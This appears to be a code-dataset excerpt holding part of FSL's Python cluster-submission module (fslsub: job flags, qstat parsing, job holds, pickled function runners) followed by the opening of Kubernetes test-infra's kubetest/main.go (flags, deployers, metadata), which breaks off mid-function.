architecture: Optional[str] = None
priority: Optional[int] = None
email: Optional[str] = None
wait_for: Union[str, None, Collection[str]] = None
job_name: Optional[str] = None
ram: Optional[int] = None
logdir: Optional[str] = None
mail_options: Optional[str] = None
flags: bool = False
multi_threaded: Optional[Tuple[str, str]] = None
verbose: bool = False
env: dict = None
cmd_line_flags = {
'-T': 'minutes',
'-q': 'queue',
'-a': 'architecture',
'-p': 'priority',
'-M': 'email',
'-N': 'job_name',
'-R': 'ram',
'-l': 'logdir',
'-m': 'mail_options',
}
def __post_init__(self):
"""
If not set explicitly by the user, don't alter the environment in which the script will be submitted
"""
if self.env is None:
self.env = dict(os.environ)
def as_flags(self):
"""
Creates flags for submission using fsl_sub
All parameters changed from their default value (typically None) will be included in the flags.
:return: tuple with the flags
"""
res = []
for key, value in self.cmd_line_flags.items():
if getattr(self, value) is not None:
res.extend((key, str(getattr(self, value))))
if self.verbose:
res.append('-v')
if self.flags:
res.append('-F')
if self.multi_threaded:
res.extend(("-s", ','.join(self.multi_threaded)))
if self.wait_for is not None and len(_flatten_job_ids(self.wait_for)) > 0:
res.extend(('-j', _flatten_job_ids(self.wait_for)))
return tuple(res)
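# Example (sketch): SubmitParams(minutes=1, logdir='log').as_flags() returns
# ('-T', '1', '-l', 'log'), following the order of cmd_line_flags above.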
def __str__(self):
return 'SubmitParams({})'.format(" ".join(self.as_flags()))
@deprecated.deprecated('3.7.0', '4.0.0',
'Use fsl.wrappers.fsl_sub instead')
def __call__(self, *command, **kwargs):
"""
Submits the command to the cluster.
:param command: string or tuple of strings with the command to submit
:param kwargs: Keyword arguments can override any parameters set in self
:return: job ID
"""
from fsl.utils.run import prepareArgs, runfsl
runner = self.update(**kwargs)
command = prepareArgs(command)
fsl_sub_cmd = ' '.join(('fsl_sub', ) + tuple(runner.as_flags()) + tuple(command))
log.debug(fsl_sub_cmd)
jobid = runfsl(fsl_sub_cmd, env=runner.env).strip()
log.debug('Job submitted as {}'.format(jobid))
return jobid
def update(self, **kwargs):
"""
Creates a new SubmitParams with updated parameters
"""
values = asdict(self)
values.update(kwargs)
return SubmitParams(**values)
@classmethod
def add_to_parser(cls, parser: argparse.ArgumentParser, as_group='fsl_sub commands',
include=('wait_for', 'logdir', 'email', 'mail_options')):
"""
Adds submission parameters to the parser
:param parser: parser that should understand submission commands
:param as_group: add as a new group
:param include: sequence of argument flags/names that should be added to the parser
(set to None to include everything)
:return: the group the arguments got added to
"""
from fsl.utils.run import runfsl, FSLNotPresent
try:
fsl_sub_run, _ = runfsl('fsl_sub', exitcode=True)
except (FileNotFoundError, FSLNotPresent):
warnings.warn('fsl_sub was not found')
return
doc_lines = fsl_sub_run.splitlines()
nspaces = 1
for line in doc_lines:
if len(line.strip()) > 0:
while line.startswith(' ' * nspaces):
nspaces += 1
nspaces -= 1
if as_group:
group = parser.add_argument_group(as_group)
else:
group = parser
def get_explanation(flag):
explanation = None
for line in doc_lines:
if explanation is not None and len(line.strip()) > 0 and line.strip()[0] != '-':
explanation.append(line[nspaces:].strip())
elif explanation is not None:
break
elif line.strip().startswith(flag):
explanation = [line[nspaces:].strip()]
if (explanation is None) or (len(explanation) == 0):
return 'documentation not found'
return ' '.join(explanation)
for flag, value in cls.cmd_line_flags.items():
if include is not None and value not in include and flag not in include:
continue
as_type = {'minutes': float, 'priority': int, 'ram': int, 'verbose': None}
action = 'store_true' if value == 'verbose' else 'store'
group.add_argument(flag, dest='_sub_' + value, help=get_explanation(flag), action=action,
metavar='<' + value + '>', type=as_type.get(value, str))
group.add_argument('-F', dest='_sub_flags', help=get_explanation('-F'), action='store_true')
group.add_argument('-v', dest='_sub_verbose', help=get_explanation('-v'), action='store_true')
group.add_argument('-s', dest='_sub_multi_threaded', help=get_explanation('-s'),
metavar='<pename>,<threads>')
group.add_argument('-j', dest='_sub_wait_for', help=get_explanation('-j'),
metavar='<jid>')
return group
@classmethod
def from_args(cls, args):
"""
Create a SubmitParams from the command line arguments
"""
as_dict = {value: getattr(args, '_sub_' + value, None) for value in cls.cmd_line_flags.values()}
if args._sub_wait_for is not None:
as_dict['wait_for'] = args._sub_wait_for.split(',')
if args._sub_multi_threaded is not None:
pename, threads = args._sub_multi_threaded.split(',')
as_dict['multi_threaded'] = pename, threads
return cls(verbose=args._sub_verbose, flags=args._sub_flags, **as_dict)
def submit(*command, **kwargs):
"""
Submits a given command to the cluster
The ``submit`` function is deprecated - you should use
:mod:`fsl.wrappers.fsl_sub` instead, or use the ``fsl_sub`` Python
library, which is available in FSL 6.0.5 and newer.
You can pass the command and arguments as a single string, or as a regular or unpacked sequence.
:arg command: string or regular/unpacked sequence of strings with the job command
:arg minutes: Estimated job length in minutes, used to auto-set
queue name
:arg queue: Explicitly sets the queue name
:arg architecture: e.g., darwin or lx24-amd64
:arg priority: Lower priority [0:-1024] default = 0
:arg email: Who to email after job completion
:arg wait_for: Place a hold on this task until the job-ids in this
string or tuple are complete
:arg job_name: Specify job name as it will appear on the queue
:arg ram: Max total RAM to use for job (integer in MB)
:arg logdir: where to output logfiles
:arg mail_options: Change the SGE mail options, see qsub for details
:arg output: If <output> image or file already exists, do nothing
and exit
:arg flags: If True, use flags embedded in scripts to set SGE
queuing options
:arg multi_threaded: Submit a multi-threaded task - Set to a tuple
containing two elements:
- <pename>: a PE configures for the requested queues
- <threads>: number of threads to run
:arg verbose: If True, use verbose mode
:arg env: Dict containing environment variables
:return: string of submitted job id
"""
return SubmitParams(**kwargs)(*command)
@deprecated.deprecated('3.7.0', '4.0.0', 'Use fsl_sub.report instead')
def info(job_ids) -> Dict[str, Optional[Dict[str, str]]]:
"""Gets information on a given job id
The ``info`` function is deprecated - you should use the
``fsl_sub.report`` function from the ``fsl_sub`` Python library, which
is available in FSL 6.0.5 and newer.
Uses `qstat -j <job_ids>`
:arg job_ids: string with job id or (nested) sequence with jobs
:return: dictionary of jobid -> another dictionary with job information
(or None if job does not exist)
"""
if not hasattr(info, '_ncall'):
info._ncall = 0
info._ncall += 1
if info._ncall == 3:
warnings.warn("Please do not call `fslsub.info` repeatably, because it slows down the cluster. You can avoid this message by simply passing all the job IDs you are interested in to a single `fslsub.info` call.")
from fsl.utils.run import run
job_ids_string = _flatten_job_ids(job_ids)
try:
result = run(['qstat', '-j', job_ids_string], exitcode=True)[0]
except FileNotFoundError:
log.debug("qstat not found; assuming not on cluster")
return {}
return _parse_qstat(job_ids_string, result)
def _parse_qstat(job_ids_string, qstat_stdout):
"""
Parses the qstat output into a dictionary of dictionaries
:param job_ids_string: input job ids
:param qstat_stdout: qstat output
:return: dictionary of jobid -> another dictionary with job information
(or None if job does not exist)
"""
res = {job_id: None for job_id in job_ids_string.split(',')}
current_job_id = None
for line in qstat_stdout.splitlines()[1:]:
line = line.strip()
if len(line) == 0:
continue
if line == '=' * len(line):
current_job_id = None
elif ':' in line:
current_key, value = [part.strip() for part in line.split(':', 1)]
if current_key == 'job_number':
current_job_id = value
if current_job_id not in job_ids_string:
raise ValueError(f"Unexpected job ID in qstat output:\n{line}")
res[current_job_id] = {}
else:
if current_job_id is None:
raise ValueError(f"Found job information before job ID in qstat output:\n{line}")
res[current_job_id][current_key] = value
else:
res[current_job_id][current_key] += '\n' + line
return res
def output(job_id, logdir='.', command=None, name=None):
"""Returns the output of the given job.
:arg job_id: String containing job ID.
:arg logdir: Directory containing the log - defaults to
the current directory.
:arg command: Command that was run. Not currently used.
:arg name: Job name if it was specified. Not currently used.
:returns: A tuple containing the standard output and standard error.
"""
stdout = list(glob.glob(op.join(logdir, '*.o{}'.format(job_id))))
stderr = list(glob.glob(op.join(logdir, '*.e{}'.format(job_id))))
if len(stdout) != 1 or len(stderr) != 1:
raise ValueError('No/too many error/output files for job {}: stdout: '
'{}, stderr: {}'.format(job_id, stdout, stderr))
stdout = stdout[0]
stderr = stderr[0]
if op.exists(stdout):
with open(stdout, 'rt') as f:
stdout = f.read()
else:
stdout = None
if op.exists(stderr):
with open(stderr, 'rt') as f:
stderr = f.read()
else:
stderr = None
return stdout, stderr
def _flatten_job_ids(job_ids):
"""
Returns a potentially nested sequence of job ids as a single comma-separated string
:param job_ids: possibly nested sequence of job ids. The job ids themselves should be strings.
:return: comma-separated string of job ids
"""
def unpack(job_ids):
"""Unpack the (nested) job-ids in a single set"""
if isinstance(job_ids, str):
return {job_ids}
elif isinstance(job_ids, int):
return {str(job_ids)}
else:
res = set()
for job_id in job_ids:
res.update(unpack(job_id))
return res
return ','.join(sorted(unpack(job_ids)))
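# Example: _flatten_job_ids(['2', ('1', '3')]) == '1,2,3' -- nested ids are
# deduplicated and returned in (lexicographically) sorted order.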
def hold(job_ids, hold_filename=None):
"""
Waits until all jobs have finished
Internally this works by submitting a new job that creates a file named `hold_filename`;
that new job will only run after all jobs in `job_ids` have finished.
This function will only return once `hold_filename` has been created
:param job_ids: possibly nested sequence of job ids. The job ids themselves should be strings.
:param hold_filename: filename to use as a hold file.
The containing directory should exist, but the file itself should not.
Defaults to a ./.<random characters>.hold in the current directory.
:return: only returns when all the jobs have finished
"""
if hold_filename is None:
with tempfile.NamedTemporaryFile(prefix='.', suffix='.hold', dir='.') as f:
hold_filename = f.name
if op.exists(hold_filename):
raise IOError(f"Hold file ({hold_filename}) already exists")
elif not op.isdir(op.split(op.abspath(hold_filename))[0]):
raise IOError(f"Hold file ({hold_filename}) can not be created in non-existent directory")
submit(('touch', hold_filename), wait_for=job_ids, minutes=1, job_name='.hold')
while not op.exists(hold_filename):
time.sleep(10)
os.remove(hold_filename)
_external_job = ("""#!{}
# This is a temporary file designed to run the python function {},
# so that it can be submitted to the cluster
import pickle
from io import BytesIO
from importlib import import_module
{}
pickle_bytes = BytesIO({})
name_type, name, func_name, args, kwargs = pickle.load(pickle_bytes)
if name_type == 'module':
# retrieves a function defined in an external module
func = getattr(import_module(name), func_name)
elif name_type == 'script':
# retrieves a function defined in the __main__ script
local_execute = {{'__name__': '__not_main__', '__file__': name}}
exec(open(name, 'r').read(), local_execute)
func = local_execute[func_name]
else:
raise ValueError('Unknown name_type: %r' % name_type)
{}
""")
def func_to_cmd(func, args=None, kwargs=None, tmp_dir=None, clean="never", verbose=False):
"""Defines the command needed to run the function from the command line
WARNING: if submitting a function defined in the __main__ script,
the script will be run again to retrieve this function. Make sure there is a
"if __name__ == '__main__'" guard to prevent the full script from being rerun.
:arg func: function to be run
:arg args: positional arguments
:arg kwargs: keyword arguments
:arg tmp_dir: directory where to store the temporary file
:arg clean: Whether the script should be removed after running. There are three options:
- "never" (default): Script is kept
- "on_success": only remove if script successfully finished (i.e., no error is raised)
- "always": always remove the script, even if it raises an error
:arg verbose: If set to True, the script will print its own filename before running
:return: string which will run the function
"""
if clean not in ('never', 'always', 'on_success'):
raise ValueError(f"Clean should be one of 'never', 'always', or 'on_success', not {clean}")
if args is None:
args = ()
if kwargs is None:
kwargs = {}
pickle_bytes = BytesIO()
if func.__module__ == '__main__':
pickle.dump(('script', importlib.import_module('__main__').__file__, func.__name__,
args, kwargs), pickle_bytes)
else:
pickle.dump(('module', func.__module__, func.__name__,
args, kwargs), pickle_bytes)
handle, filename = tempfile.mkstemp(prefix=func.__name__ + '_',
suffix='.py',
dir=tmp_dir)
os.close(handle)
verbose_script = f'\nprint("running {filename}")\n' if verbose else ''
if clean == 'never':
run_script = "res = func(*args, **kwargs)"
elif clean == 'always':
run_script = f"""try:
res = func(*args, **kwargs)
finally:
import os; os.remove("{filename}")"""
elif clean == 'on_success':
run_script = f"""res = func(*args, **kwargs)
import os; os.remove("{filename}")"""
python_cmd = _external_job.format(sys.executable,
func.__name__,
verbose_script,
pickle_bytes.getvalue(),
run_script)
with open(filename, 'w') as python_file:
python_file.write(python_cmd)
return sys.executable + " " + filename
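# Illustrative use of func_to_cmd (a sketch; `my_analysis` is a hypothetical
# module-level function, and the returned command string could be handed to a
# cluster submission call):
#
#   def my_analysis(subject, smoothing=5):
#       ...
#
#   cmd = func_to_cmd(my_analysis, args=('s01', ),
#                     kwargs={'smoothing': 8}, clean='on_success')
#   # cmd looks like "/usr/bin/python /tmp/my_analysis_XXXX.py"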
| [] | [] | [] | [] | [] | python | 0 | 0 | |
kubetest/main.go | /*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"context"
"encoding/json"
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"math/rand"
"os"
"os/exec"
"os/signal"
"path/filepath"
"regexp"
"strconv"
"strings"
"time"
"github.com/spf13/pflag"
"sigs.k8s.io/boskos/client"
"k8s.io/test-infra/kubetest/conformance"
"k8s.io/test-infra/kubetest/kind"
"k8s.io/test-infra/kubetest/process"
"k8s.io/test-infra/kubetest/util"
)
// Hardcoded in ginkgo-e2e.sh
const defaultGinkgoParallel = 25
var (
artifacts = filepath.Join(os.Getenv("WORKSPACE"), "_artifacts")
interrupt = time.NewTimer(time.Duration(0)) // interrupt testing at this time.
terminate = time.NewTimer(time.Duration(0)) // terminate testing at this time.
verbose = false
timeout = time.Duration(0)
boskos, _ = client.NewClient(os.Getenv("JOB_NAME"), "http://boskos.test-pods.svc.cluster.local.", "", "")
control = process.NewControl(timeout, interrupt, terminate, verbose)
)
type options struct {
build buildStrategy
charts bool
checkLeaks bool
checkSkew bool
cluster string
clusterIPRange string
deployment string
down bool
dump string
dumpPreTestLogs string
extract extractStrategies
extractCIBucket string
extractReleaseBucket string
extractSource bool
flushMemAfterBuild bool
focusRegex string
gcpCloudSdk string
gcpMasterImage string
gcpMasterSize string
gcpNetwork string
gcpNodeImage string
gcpImageFamily string
gcpImageProject string
gcpNodes string
gcpNodeSize string
gcpProject string
gcpProjectType string
gcpServiceAccount string
	// gcpSSHProxyInstanceName is the name of the VM instance whose IP address will be used to set the
	// KUBE_SSH_BASTION env. If set, ssh connections in tests are proxied through this
	// "bastion". It's useful for clusters whose nodes have no public ssh access, e.g. nodes without
	// public IP addresses. Works only for gcp providers (gce, gke).
gcpSSHProxyInstanceName string
gcpRegion string
gcpZone string
ginkgoParallel ginkgoParallelValue
kubecfg string
kubemark bool
kubemarkMasterSize string
kubemarkNodes string // TODO(fejta): switch to int after migration
logexporterGCSPath string
metadataSources string
noAllowDup bool
nodeArgs string
nodeTestArgs string
nodeTests bool
outputDir string
provider string
publish string
runtimeConfig string
save string
skew bool
skipRegex string
soak bool
soakDuration time.Duration
sshUser string
stage stageStrategy
test bool
testArgs string
testCmd string
testCmdName string
testCmdArgs []string
up bool
upgradeArgs string
boskosWaitDuration time.Duration
}
func defineFlags() *options {
o := options{}
flag.Var(&o.build, "build", "Rebuild k8s binaries, optionally forcing (release|quick|bazel) strategy")
flag.BoolVar(&o.charts, "charts", false, "If true, run charts tests")
flag.BoolVar(&o.checkSkew, "check-version-skew", true, "Verify client and server versions match")
flag.BoolVar(&o.checkLeaks, "check-leaked-resources", false, "Ensure project ends with the same resources")
flag.StringVar(&o.cluster, "cluster", "", "Cluster name. Must be set for --deployment=gke (TODO: other deployments).")
flag.StringVar(&o.clusterIPRange, "cluster-ip-range", "", "Specifies CLUSTER_IP_RANGE value during --up and --test (only relevant for --deployment=bash). Auto-calculated if empty.")
flag.StringVar(&o.deployment, "deployment", "bash", "Choices: none/bash/conformance/gke/kind/kops/node/local")
flag.BoolVar(&o.down, "down", false, "If true, tear down the cluster before exiting.")
flag.StringVar(&o.dump, "dump", "", "If set, dump bring-up and cluster logs to this location on test or cluster-up failure")
flag.StringVar(&o.dumpPreTestLogs, "dump-pre-test-logs", "", "If set, dump cluster logs to this location before running tests")
flag.Var(&o.extract, "extract", "Extract k8s binaries from the specified release location")
flag.StringVar(&o.extractCIBucket, "extract-ci-bucket", "kubernetes-release-dev", "Extract k8s CI binaries from the specified GCS bucket")
flag.StringVar(&o.extractReleaseBucket, "extract-release-bucket", "kubernetes-release", "Extract k8s release binaries from the specified GCS bucket")
flag.BoolVar(&o.extractSource, "extract-source", false, "Extract k8s src together with other tarballs")
flag.BoolVar(&o.flushMemAfterBuild, "flush-mem-after-build", false, "If true, try to flush container memory after building")
flag.Var(&o.ginkgoParallel, "ginkgo-parallel", fmt.Sprintf("Run Ginkgo tests in parallel, default %d runners. Use --ginkgo-parallel=N to specify an exact count.", defaultGinkgoParallel))
flag.StringVar(&o.gcpCloudSdk, "gcp-cloud-sdk", "", "Install/upgrade google-cloud-sdk to the gs:// path if set")
flag.StringVar(&o.gcpProject, "gcp-project", "", "For use with gcloud commands")
flag.StringVar(&o.gcpProjectType, "gcp-project-type", "", "Explicitly indicate which project type to select from boskos")
flag.StringVar(&o.gcpServiceAccount, "gcp-service-account", "", "Service account to activate before using gcloud")
flag.StringVar(&o.gcpZone, "gcp-zone", "", "For use with gcloud commands")
flag.StringVar(&o.gcpRegion, "gcp-region", "", "For use with gcloud commands")
flag.StringVar(&o.gcpNetwork, "gcp-network", "", "Cluster network. Must be set for --deployment=gke (TODO: other deployments).")
flag.StringVar(&o.gcpMasterImage, "gcp-master-image", "", "Master image type (cos|debian on GCE, n/a on GKE)")
flag.StringVar(&o.gcpMasterSize, "gcp-master-size", "", "(--provider=gce only) Size of master to create (e.g n1-standard-1). Auto-calculated if left empty.")
flag.StringVar(&o.gcpNodeImage, "gcp-node-image", "", "Node image type (cos|container_vm on GKE, cos|debian on GCE)")
flag.StringVar(&o.gcpImageFamily, "image-family", "", "Node image family from which to use the latest image, required when --gcp-node-image=CUSTOM")
flag.StringVar(&o.gcpImageProject, "image-project", "", "Project containing node image family, required when --gcp-node-image=CUSTOM")
flag.StringVar(&o.gcpNodes, "gcp-nodes", "", "(--provider=gce only) Number of nodes to create.")
flag.StringVar(&o.gcpNodeSize, "gcp-node-size", "", "(--provider=gce only) Size of nodes to create (e.g n1-standard-1).")
flag.StringVar(&o.gcpSSHProxyInstanceName, "gcp-ssh-proxy-instance-name", "", "(--provider=gce|gke only) If set, will result in proxing the ssh connections via the provided instance name while running tests")
flag.StringVar(&o.kubecfg, "kubeconfig", "", "The location of a kubeconfig file.")
flag.StringVar(&o.focusRegex, "ginkgo-focus", "", "The ginkgo regex to focus. Currently only respected for (dind).")
flag.StringVar(&o.skipRegex, "ginkgo-skip", "", "The ginkgo regex to skip. Currently only respected for (dind).")
flag.BoolVar(&o.kubemark, "kubemark", false, "If true, run kubemark tests.")
flag.StringVar(&o.kubemarkMasterSize, "kubemark-master-size", "", "Kubemark master size (only relevant if --kubemark=true). Auto-calculated based on '--kubemark-nodes' if left empty.")
flag.StringVar(&o.kubemarkNodes, "kubemark-nodes", "5", "Number of kubemark nodes to start (only relevant if --kubemark=true).")
flag.StringVar(&o.logexporterGCSPath, "logexporter-gcs-path", "", "Path to the GCS artifacts directory to dump logs from nodes. Logexporter gets enabled if this is non-empty")
flag.StringVar(&o.metadataSources, "metadata-sources", "images.json", "Comma-separated list of files inside ./artifacts to merge into metadata.json")
flag.StringVar(&o.nodeArgs, "node-args", "", "Args for node e2e tests.")
flag.StringVar(&o.nodeTestArgs, "node-test-args", "", "Test args specifically for node e2e tests.")
flag.BoolVar(&o.noAllowDup, "no-allow-dup", false, "if set --allow-dup will not be passed to push-build and --stage will error if the build already exists on the gcs path")
flag.BoolVar(&o.nodeTests, "node-tests", false, "If true, run node-e2e tests.")
flag.StringVar(&o.provider, "provider", "", "Kubernetes provider such as gce, gke, aws, etc")
flag.StringVar(&o.publish, "publish", "", "Publish version to the specified gs:// path on success")
flag.StringVar(&o.runtimeConfig, "runtime-config", "batch/v2alpha1=true", "If set, API versions can be turned on or off while bringing up the API server.")
flag.StringVar(&o.stage.dockerRegistry, "registry", "", "Push images to the specified docker registry (e.g. gcr.io/a-test-project)")
flag.StringVar(&o.save, "save", "", "Save credentials to gs:// path on --up if set (or load from there if not --up)")
flag.BoolVar(&o.skew, "skew", false, "If true, run tests in another version at ../kubernetes/kubernetes_skew")
flag.BoolVar(&o.soak, "soak", false, "If true, job runs in soak mode")
flag.DurationVar(&o.soakDuration, "soak-duration", 7*24*time.Hour, "Maximum age of a soak cluster before it gets recycled")
flag.Var(&o.stage, "stage", "Upload binaries to gs://bucket/devel/job-suffix if set")
flag.StringVar(&o.stage.versionSuffix, "stage-suffix", "", "Append suffix to staged version when set")
flag.BoolVar(&o.test, "test", false, "Run Ginkgo tests.")
flag.StringVar(&o.testArgs, "test_args", "", "Space-separated list of arguments to pass to Ginkgo test runner.")
flag.StringVar(&o.testCmd, "test-cmd", "", "command to run against the cluster instead of Ginkgo e2e tests")
flag.StringVar(&o.testCmdName, "test-cmd-name", "", "name to log the test command as in xml results")
flag.DurationVar(&timeout, "timeout", time.Duration(0), "Terminate testing after the timeout duration (s/m/h)")
flag.BoolVar(&o.up, "up", false, "If true, start the e2e cluster. If cluster is already up, recreate it.")
flag.StringVar(&o.upgradeArgs, "upgrade_args", "", "If set, run upgrade tests before other tests")
flag.DurationVar(&o.boskosWaitDuration, "boskos-wait-duration", 5*time.Minute, "Defines how long it waits until quit getting Boskos resoure, default 5 minutes")
// The "-v" flag was also used by glog, which is used by k8s.io/client-go. Duplicate flags cause panics.
// 1. Even if we could convince glog to change, they have too many consumers to ever do so.
// 2. The glog lib parses flags during init. It is impossible to dynamically rewrite the args before they're parsed by glog.
// 3. The glog lib takes an int value, so "-v false" is an error.
// 4. It's possible, but unlikely, we could convince k8s.io/client-go to use a logging shim, because a library shouldn't force a logging implementation. This would take a major version release for the lib.
//
// The most reasonable solution is to accept that we shouldn't have made a single-letter global, and rename all references to this variable.
flag.BoolVar(&verbose, "verbose-commands", true, "If true, print all command output.")
// go flag does not support StringArrayVar
pflag.StringArrayVar(&o.testCmdArgs, "test-cmd-args", []string{}, "args for test-cmd")
return &o
}
var suite util.TestSuite = util.TestSuite{Name: "kubetest"}
func validWorkingDirectory() error {
cwd, err := os.Getwd()
if err != nil {
return fmt.Errorf("could not get pwd: %v", err)
}
acwd, err := filepath.Abs(cwd)
if err != nil {
return fmt.Errorf("failed to convert %s to an absolute path: %v", cwd, err)
}
// This also matches "kubernetes_skew" for upgrades.
if !strings.Contains(filepath.Base(acwd), "kubernetes") {
return fmt.Errorf("must run from kubernetes directory root. current: %v", acwd)
}
return nil
}
type deployer interface {
Up() error
IsUp() error
DumpClusterLogs(localPath, gcsPath string) error
TestSetup() error
Down() error
GetClusterCreated(gcpProject string) (time.Time, error)
KubectlCommand() (*exec.Cmd, error)
}
// publisher is implemented by deployers that want to publish status on success
type publisher interface {
// Publish is called when the tests were successful; the deployer should publish a success file
Publish() error
}
func getDeployer(o *options) (deployer, error) {
switch o.deployment {
case "bash":
return newBash(&o.clusterIPRange, o.gcpProject, o.gcpZone, o.gcpSSHProxyInstanceName, o.provider), nil
case "conformance":
return conformance.NewDeployer(o.kubecfg)
case "gke":
return newGKE(o.provider, o.gcpProject, o.gcpZone, o.gcpRegion, o.gcpNetwork, o.gcpNodeImage, o.gcpImageFamily, o.gcpImageProject, o.cluster, o.gcpSSHProxyInstanceName, &o.testArgs, &o.upgradeArgs)
case "kind":
return kind.NewDeployer(control, string(o.build))
case "kops":
return newKops(o.provider, o.gcpProject, o.cluster)
case "node":
return nodeDeploy{provider: o.provider}, nil
case "none":
return noneDeploy{}, nil
case "local":
return newLocalCluster(), nil
case "aksengine":
return newAKSEngine()
case "aks":
return newAksDeployer()
default:
return nil, fmt.Errorf("unknown deployment strategy %q", o.deployment)
}
}
func validateFlags(o *options) error {
if !o.extract.Enabled() && o.extractSource {
return errors.New("--extract-source flag cannot be passed without --extract")
}
return nil
}
func main() {
log.SetFlags(log.LstdFlags | log.Lshortfile)
// Initialize global pseudo random generator. Initializing it to select random AWS Zones.
rand.Seed(time.Now().UnixNano())
pflag.CommandLine = pflag.NewFlagSet(os.Args[0], pflag.ContinueOnError)
o := defineFlags()
pflag.CommandLine.AddGoFlagSet(flag.CommandLine)
if err := pflag.CommandLine.Parse(os.Args[1:]); err != nil {
log.Fatalf("Flag parse failed: %v", err)
}
if err := validateFlags(o); err != nil {
log.Fatalf("Flags validation failed. err: %v", err)
}
control = process.NewControl(timeout, interrupt, terminate, verbose)
// do things when we know we are running in the kubetest image
if os.Getenv("KUBETEST_IN_DOCKER") == "true" {
o.flushMemAfterBuild = true
}
// sanity fix for kind deployer, not set for other deployers to avoid
// breaking changes...
if o.deployment == "kind" {
// always default --dump for kind, in CI use $ARTIFACTS
artifacts := os.Getenv("ARTIFACTS")
if artifacts == "" {
artifacts = "./_artifacts"
}
o.dump = artifacts
}
err := complete(o)
if boskos.HasResource() {
if berr := boskos.ReleaseAll("dirty"); berr != nil {
log.Fatalf("[Boskos] Fail To Release: %v, kubetest err: %v", berr, err)
}
}
if err != nil {
log.Fatalf("Something went wrong: %v", err)
}
}
func complete(o *options) error {
if !terminate.Stop() {
<-terminate.C // Drain the value if necessary.
}
if !interrupt.Stop() {
<-interrupt.C // Drain value
}
if timeout > 0 {
log.Printf("Limiting testing to %s", timeout)
interrupt.Reset(timeout)
}
if o.dump != "" {
defer writeMetadata(o.dump, o.metadataSources)
defer control.WriteXML(&suite, o.dump, time.Now())
}
if o.logexporterGCSPath != "" {
o.testArgs += fmt.Sprintf(" --logexporter-gcs-path=%s", o.logexporterGCSPath)
}
if err := prepare(o); err != nil {
return fmt.Errorf("failed to prepare test environment: %v", err)
}
// Get the deployer before we acquire k8s so any additional flag
// verifications happen early.
deploy, err := getDeployer(o)
if err != nil {
return fmt.Errorf("error creating deployer: %v", err)
}
// Check soaking before run tests
if o.soak {
if created, err := deploy.GetClusterCreated(o.gcpProject); err != nil {
// continue, but log the error
log.Printf("deploy %v, GetClusterCreated failed: %v", o.deployment, err)
} else {
if time.Now().After(created.Add(o.soakDuration)) {
// flip up on - which will tear down previous cluster and start a new one
log.Printf("Previous soak cluster created at %v, will recreate the cluster", created)
o.up = true
}
}
}
if err := acquireKubernetes(o, deploy); err != nil {
return fmt.Errorf("failed to acquire k8s binaries: %v", err)
}
if o.extract.Enabled() {
// If we specified `--extract-source` we will already be in the correct directory
if !o.extractSource {
if err := os.Chdir("kubernetes"); err != nil {
return fmt.Errorf("failed to chdir to kubernetes dir: %v", err)
}
}
}
if err := validWorkingDirectory(); err != nil {
return fmt.Errorf("called from invalid working directory: %v", err)
}
if o.down {
// listen for signals such as ^C and gracefully attempt to clean up
c := make(chan os.Signal, 1)
signal.Notify(c, os.Interrupt)
go func() {
for range c {
log.Print("Captured ^C, gracefully attempting to cleanup resources..")
if err = deploy.Down(); err != nil {
log.Printf("Tearing down deployment failed: %v", err)
}
if err != nil {
os.Exit(1)
}
os.Exit(2)
}
}()
}
if err := run(deploy, *o); err != nil {
return err
}
// Publish the successfully tested version when requested
if o.publish != "" {
if err := publish(o.publish); err != nil {
return err
}
}
return nil
}
func acquireKubernetes(o *options, d deployer) error {
// Potentially build kubernetes
if o.build.Enabled() {
var err error
// kind deployer manages build
if k, ok := d.(*kind.Deployer); ok {
err = control.XMLWrap(&suite, "Build", k.Build)
} else if c, ok := d.(*aksEngineDeployer); ok { // Azure deployer
err = control.XMLWrap(&suite, "Build", func() error {
return c.Build(o.build)
})
} else {
err = control.XMLWrap(&suite, "Build", o.build.Build)
}
if o.flushMemAfterBuild {
util.FlushMem()
}
if err != nil {
return err
}
}
// Potentially stage build binaries somewhere on GCS
if o.stage.Enabled() {
if err := control.XMLWrap(&suite, "Stage", func() error {
return o.stage.Stage(o.noAllowDup)
}); err != nil {
return err
}
}
// Potentially download existing binaries and extract them.
if o.extract.Enabled() {
err := control.XMLWrap(&suite, "Extract", func() error {
// Should we restore a previous state?
// Restore if we are not upping the cluster
if o.save != "" {
if !o.up {
// Restore version and .kube/config from --up
log.Printf("Overwriting extract strategy to load kubeconfig and version from %s", o.save)
o.extract = extractStrategies{
extractStrategy{
mode: load,
option: o.save,
},
}
}
}
// New deployment, extract new version
return o.extract.Extract(o.gcpProject, o.gcpZone, o.gcpRegion, o.extractCIBucket, o.extractReleaseBucket, o.extractSource)
})
if err != nil {
return err
}
}
return nil
}
// Returns the k8s version name
func findVersion() string {
// The version may be in a version file
if _, err := os.Stat("version"); err == nil {
b, err := ioutil.ReadFile("version")
if err == nil {
return strings.TrimSpace(string(b))
}
log.Printf("Failed to read version: %v", err)
}
// We can also get it from the git repo.
if _, err := os.Stat("hack/lib/version.sh"); err == nil {
// TODO(fejta): do this in go. At least we removed the upload-to-gcs.sh dep.
gross := `. hack/lib/version.sh && KUBE_ROOT=. kube::version::get_version_vars && echo "${KUBE_GIT_VERSION-}"`
b, err := control.Output(exec.Command("bash", "-c", gross))
if err == nil {
return strings.TrimSpace(string(b))
}
log.Printf("Failed to get_version_vars: %v", err)
}
return "unknown" // Sad trombone
}
// maybeMergeJSON adds new keyvals from the file at path into the map; quietly eats errors.
func maybeMergeJSON(meta map[string]string, path string) {
if data, err := ioutil.ReadFile(path); err == nil {
json.Unmarshal(data, &meta)
}
}
// Write metadata.json, including version and env arg data.
func writeMetadata(path, metadataSources string) error {
m := make(map[string]string)
// Look for any sources of metadata and load 'em
for _, f := range strings.Split(metadataSources, ",") {
maybeMergeJSON(m, filepath.Join(path, f))
}
ver := findVersion()
m["job-version"] = ver // TODO(krzyzacy): retire
m["revision"] = ver
re := regexp.MustCompile(`^BUILD_METADATA_(.+)$`)
for _, e := range os.Environ() {
p := strings.SplitN(e, "=", 2)
r := re.FindStringSubmatch(p[0])
if r == nil {
continue
}
k, v := strings.ToLower(r[1]), p[1]
m[k] = v
}
f, err := os.Create(filepath.Join(path, "metadata.json"))
